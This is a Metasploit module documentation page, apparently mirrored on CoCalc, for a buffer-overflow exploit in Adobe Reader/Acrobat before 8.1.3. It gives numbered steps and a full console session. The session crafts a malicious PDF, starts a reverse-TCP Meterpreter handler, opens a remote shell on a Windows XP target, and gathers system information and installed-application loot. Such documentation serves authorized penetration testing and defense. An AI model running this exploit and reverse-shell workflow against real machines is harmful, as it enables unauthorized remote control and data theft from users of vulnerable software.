CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md
Views: 1904

Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.

Link to vulnerable software OldVersion

Verification Steps

  1. Install application on the target machine

  2. Start msfconsole

  3. Do: use exploit/windows/fileformat/adobe_utilprintf

  4. Do: set payload [windows/meterpreter/reverse_tcp]

  5. Do: set LHOST [IP]

  6. Do: exploit

  7. Do: use exploit/multi/handler

  8. Do: set LHOST [IP]

  9. Do: exploit

  10. Do: Open PDF on target machine with vulnerable software

Scenarios

Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
  FILENAME => utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > exploit

  [*] Creating 'utilprintf.pdf' file...
  [+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit
msf exploit(multi/handler) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit

  [*] Started reverse TCP handler on 192.168.1.3:4444
  [*] Sending stage (180291 bytes) to 192.168.1.5
  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700

meterpreter > sysinfo
  Computer        : COMPUTER_1
  OS              : Windows XP (5.1 Build 2600, Service Pack 3).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter > getuid
  Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

  [*] Enumerating applications installed on COMPUTER_1

  Installed Applications
  ======================

  Name            Version
  ----            -------
  Adobe Reader 8  8.0.0


  [+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
  ```